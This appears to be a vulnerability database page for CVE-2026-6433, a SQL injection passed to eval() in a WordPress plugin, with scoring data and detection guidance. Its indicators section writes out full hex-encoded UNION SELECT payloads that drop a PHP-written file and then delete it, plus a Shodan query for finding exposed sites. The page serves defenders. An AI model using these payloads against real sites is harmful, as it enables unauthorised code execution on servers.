cbcvebase.
CVE-2026-6433
published 2026-05-11

CVE-2026-6433: The Custom css-js-php WordPress plugin through 2.0.7 does not properly sanitize user input before using it in a SQL query, and the result is passed to eval()…

PriorityP276high7.3CVSS 3.1
AVNACLPRNUINSUCLILAL
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
0.75%
50.4th percentile
The Custom css-js-php WordPress plugin through 2.0.7 does not properly sanitize user input before using it in a SQL query, and the result is passed to eval(), allowing unauthenticated users to execute arbitrary PHP code on the server.

Detection & IOCsextracted from sources · hover to see the quote

url/wp-admin/admin-ajax.php
commandaction=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702066696c655f7075745f636f6e74656e74732827{{hex_encode(filename)}}2e747874272c27{{hex_encode(marker)}}27293b203f3e,'header','',0,1--+
commandaction=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702040756e6c696e6b2827{{hex_encode(filename)}}2e74787427293b203f3e,'header','',0,1--+
path/wp-admin/{{rand_text_alpha(8)}}.txt
bytes
0x3c3f706870 (<?php prefix in hex, injected via UNION SELECT payload)
  • Exploit targets the unauthenticated AJAX action 'fc_ajax_call' with operation 'wce_editor_inline_code' via POST to /wp-admin/admin-ajax.php; no authentication is required.
  • Attack uses a UNION-based SQL injection in the 'id' parameter to inject a PHP file_put_contents() payload encoded in hex, writing a .txt file under /wp-admin/; detect POST requests to admin-ajax.php with 'id' containing UNION SELECT and hex-encoded PHP tags.
  • Second-stage payload uses PHP @unlink() to clean up the dropped file; monitor for POST to admin-ajax.php with hex-encoded 0x3c3f706870 (<?php) in the id parameter body.
  • Unauthenticated SQL injection result is passed to eval(), enabling arbitrary PHP code execution; monitor for eval() calls originating from the custom-css-js-php plugin context.
  • Shodan fingerprint for exposed targets: http.component:"WordPress"; combine with detection of the fc_ajax_call action in web logs.
  • ·The Nuclei template uses randomized filename and marker variables per execution ({{rand_text_alpha(8)}} and {{rand_text_alpha(12)}}), so the dropped .txt file path and its content marker will differ on every exploit attempt — static string matching on the filename alone is insufficient.
  • ·The exploit is a three-step flow (inject → verify file write → cleanup); detection must correlate all three requests. A 200 or 500 response on the first POST is considered a success condition by the template.
  • ·Affected versions are 2.0.7 and below; the vulnerability is exploitable without any authentication (PR:N, UI:N), so no session or cookie indicators will be present in attacker traffic.

CVSS provenance

nvdv3.17.3HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
vulncheck7.3HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.